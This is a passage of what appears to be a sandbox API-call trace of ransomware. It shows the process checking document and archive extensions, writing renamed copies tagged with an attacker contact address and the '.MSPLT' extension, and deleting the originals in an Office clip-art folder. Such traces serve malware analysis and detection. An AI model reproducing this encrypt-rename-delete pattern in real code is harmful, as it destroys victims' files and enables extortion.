(lpString=".xls") returned 4 [0319.434] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.434] lstrlenW (lpString=".xlsx") returned 5 [0319.434] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.434] lstrlenW (lpString=".ppt") returned 4 [0319.434] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.434] lstrlenW (lpString=".zip") returned 4 [0319.434] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.434] lstrlenW (lpString=".rar") returned 4 [0319.435] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.435] lstrlenW (lpString=".bz2") returned 4 [0319.435] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.435] lstrlenW (lpString=".7z") returned 3 [0319.435] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.435] lstrlenW (lpString=".dbf") returned 4 [0319.435] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.435] lstrlenW (lpString=".1cd") returned 4 [0319.435] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EXPLR_01.MID") returned 68 [0319.435] lstrlenW (lpString=".jpg") returned 4 [0319.435] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.435] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.435] lstrlenW (lpString="GRID_01.MID") returned 11 [0319.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0319.437] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=6331) returned 1 [0319.437] CloseHandle (hObject=0x528) returned 1 [0319.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid")) returned 0x220 [0319.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0319.438] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.438] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.443] GetLastError () returned 0x0 [0319.443] ReadFile (in: hFile=0x528, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x18bb, lpOverlapped=0x0) returned 1 [0319.460] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x18c0, lpOverlapped=0x0) returned 1 [0319.461] ReadFile (in: hFile=0x528, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0319.461] WriteFile (in: hFile=0x534, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xea, lpOverlapped=0x0) returned 1 [0319.462] SetEndOfFile (hFile=0x534) returned 1 [0319.462] CloseHandle (hObject=0x534) returned 1 [0319.462] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.462] SetEndOfFile (hFile=0x528) returned 1 [0319.466] CloseHandle (hObject=0x528) returned 1 [0319.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\grid_01.mid")) returned 1 [0319.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.467] lstrlenW (lpString=".doc") returned 4 [0319.467] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.467] lstrlenW (lpString=".docx") returned 5 [0319.467] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.467] lstrlenW (lpString=".pdf") returned 4 [0319.467] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.468] lstrlenW (lpString=".xls") returned 4 [0319.468] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.468] lstrlenW (lpString=".xlsx") returned 5 [0319.468] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.468] lstrlenW (lpString=".ppt") returned 4 [0319.468] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.468] lstrlenW (lpString=".zip") returned 4 [0319.468] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.468] lstrlenW (lpString=".rar") returned 4 [0319.468] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.468] lstrlenW (lpString=".bz2") returned 4 [0319.468] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.468] lstrlenW (lpString=".7z") returned 3 [0319.468] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.468] lstrlenW (lpString=".dbf") returned 4 [0319.468] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.468] lstrlenW (lpString=".1cd") returned 4 [0319.468] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.468] lstrlenW (lpString=".jpg") returned 4 [0319.468] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.468] lstrlenW (lpString=".doc") returned 4 [0319.469] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0319.469] lstrlenW (lpString=".docx") returned 5 [0319.469] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0319.469] lstrlenW (lpString=".pdf") returned 4 [0319.469] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0319.469] lstrlenW (lpString=".xls") returned 4 [0319.469] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0319.469] lstrlenW (lpString=".xlsx") returned 5 [0319.469] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0319.469] lstrlenW (lpString=".ppt") returned 4 [0319.469] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0319.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.469] lstrlenW (lpString=".zip") returned 4 [0319.469] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0319.469] lstrlenW (lpString=".rar") returned 4 [0319.469] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0319.469] lstrlenW (lpString=".bz2") returned 4 [0319.469] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0319.469] lstrlenW (lpString=".7z") returned 3 [0319.469] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0319.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.469] lstrlenW (lpString=".dbf") returned 4 [0319.469] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0319.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.469] lstrlenW (lpString=".1cd") returned 4 [0319.469] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0319.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\GRID_01.MID") returned 67 [0319.470] lstrlenW (lpString=".jpg") returned 4 [0319.470] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0319.470] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0319.470] lstrlenW (lpString="INDST_01.MID") returned 12 [0319.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0319.919] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=8568) returned 1 [0319.920] CloseHandle (hObject=0x528) returned 1 [0319.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid")) returned 0x220 [0319.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.920] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0319.920] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.920] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0319.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x520 [0319.923] GetLastError () returned 0x0 [0319.923] ReadFile (in: hFile=0x528, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x2178, lpOverlapped=0x0) returned 1 [0320.089] WriteFile (in: hFile=0x520, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x2180, lpOverlapped=0x0) returned 1 [0320.090] ReadFile (in: hFile=0x528, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0320.090] WriteFile (in: hFile=0x520, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xec, lpOverlapped=0x0) returned 1 [0320.091] SetEndOfFile (hFile=0x520) returned 1 [0320.091] CloseHandle (hObject=0x520) returned 1 [0320.091] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0320.091] SetEndOfFile (hFile=0x528) returned 1 [0320.095] CloseHandle (hObject=0x528) returned 1 [0320.095] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.096] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\indst_01.mid")) returned 1 [0320.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.097] lstrlenW (lpString=".doc") returned 4 [0320.097] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.097] lstrlenW (lpString=".docx") returned 5 [0320.097] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.097] lstrlenW (lpString=".pdf") returned 4 [0320.097] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.097] lstrlenW (lpString=".xls") returned 4 [0320.097] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.097] lstrlenW (lpString=".xlsx") returned 5 [0320.097] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.098] lstrlenW (lpString=".ppt") returned 4 [0320.098] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.098] lstrlenW (lpString=".zip") returned 4 [0320.098] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.098] lstrlenW (lpString=".rar") returned 4 [0320.098] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.098] lstrlenW (lpString=".bz2") returned 4 [0320.098] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.098] lstrlenW (lpString=".7z") returned 3 [0320.098] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.098] lstrlenW (lpString=".dbf") returned 4 [0320.098] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.098] lstrlenW (lpString=".1cd") returned 4 [0320.098] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.098] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.099] lstrlenW (lpString=".jpg") returned 4 [0320.099] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.099] lstrlenW (lpString=".doc") returned 4 [0320.099] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.099] lstrlenW (lpString=".docx") returned 5 [0320.099] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0320.099] lstrlenW (lpString=".pdf") returned 4 [0320.099] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.099] lstrlenW (lpString=".xls") returned 4 [0320.099] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.099] lstrlenW (lpString=".xlsx") returned 5 [0320.099] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0320.099] lstrlenW (lpString=".ppt") returned 4 [0320.099] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.099] lstrlenW (lpString=".zip") returned 4 [0320.099] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.099] lstrlenW (lpString=".rar") returned 4 [0320.099] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.099] lstrlenW (lpString=".bz2") returned 4 [0320.100] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.100] lstrlenW (lpString=".7z") returned 3 [0320.100] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.100] lstrlenW (lpString=".dbf") returned 4 [0320.100] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.100] lstrlenW (lpString=".1cd") returned 4 [0320.100] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\INDST_01.MID") returned 68 [0320.100] lstrlenW (lpString=".jpg") returned 4 [0320.100] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.100] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.100] lstrlenW (lpString="PAPER_01.MID") returned 12 [0320.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x55c [0320.139] GetFileSizeEx (in: hFile=0x55c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=6763) returned 1 [0320.140] CloseHandle (hObject=0x55c) returned 1 [0320.140] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid")) returned 0x220 [0320.333] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0321.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0321.462] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.462] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0321.464] GetLastError () returned 0x0 [0321.464] ReadFile (in: hFile=0x53c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x1a6b, lpOverlapped=0x0) returned 1 [0321.469] WriteFile (in: hFile=0x52c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x1a70, lpOverlapped=0x0) returned 1 [0321.473] ReadFile (in: hFile=0x53c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0321.473] WriteFile (in: hFile=0x52c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0xec, lpOverlapped=0x0) returned 1 [0321.473] SetEndOfFile (hFile=0x52c) returned 1 [0321.474] CloseHandle (hObject=0x52c) returned 1 [0321.474] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.474] SetEndOfFile (hFile=0x53c) returned 1 [0321.481] CloseHandle (hObject=0x53c) returned 1 [0321.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0321.482] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\paper_01.mid")) returned 1 [0321.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.483] lstrlenW (lpString=".doc") returned 4 [0321.483] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0321.483] lstrlenW (lpString=".docx") returned 5 [0321.483] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0321.483] lstrlenW (lpString=".pdf") returned 4 [0321.483] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0321.483] lstrlenW (lpString=".xls") returned 4 [0321.483] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0321.483] lstrlenW (lpString=".xlsx") returned 5 [0321.483] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0321.483] lstrlenW (lpString=".ppt") returned 4 [0321.483] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0321.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.484] lstrlenW (lpString=".zip") returned 4 [0321.484] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0321.484] lstrlenW (lpString=".rar") returned 4 [0321.484] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0321.484] lstrlenW (lpString=".bz2") returned 4 [0321.484] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0321.484] lstrlenW (lpString=".7z") returned 3 [0321.484] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0321.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.484] lstrlenW (lpString=".dbf") returned 4 [0321.484] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0321.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.484] lstrlenW (lpString=".1cd") returned 4 [0321.484] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0321.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.484] lstrlenW (lpString=".jpg") returned 4 [0321.484] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0321.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.484] lstrlenW (lpString=".doc") returned 4 [0321.485] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0321.485] lstrlenW (lpString=".docx") returned 5 [0321.485] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0321.485] lstrlenW (lpString=".pdf") returned 4 [0321.485] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0321.485] lstrlenW (lpString=".xls") returned 4 [0321.485] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0321.485] lstrlenW (lpString=".xlsx") returned 5 [0321.485] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0321.485] lstrlenW (lpString=".ppt") returned 4 [0321.485] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0321.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 68 [0321.485] lstrlenW (lpString=".zip") returned 4 [0321.485] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0321.485] lstrlenW (lpString=".rar") returned 4 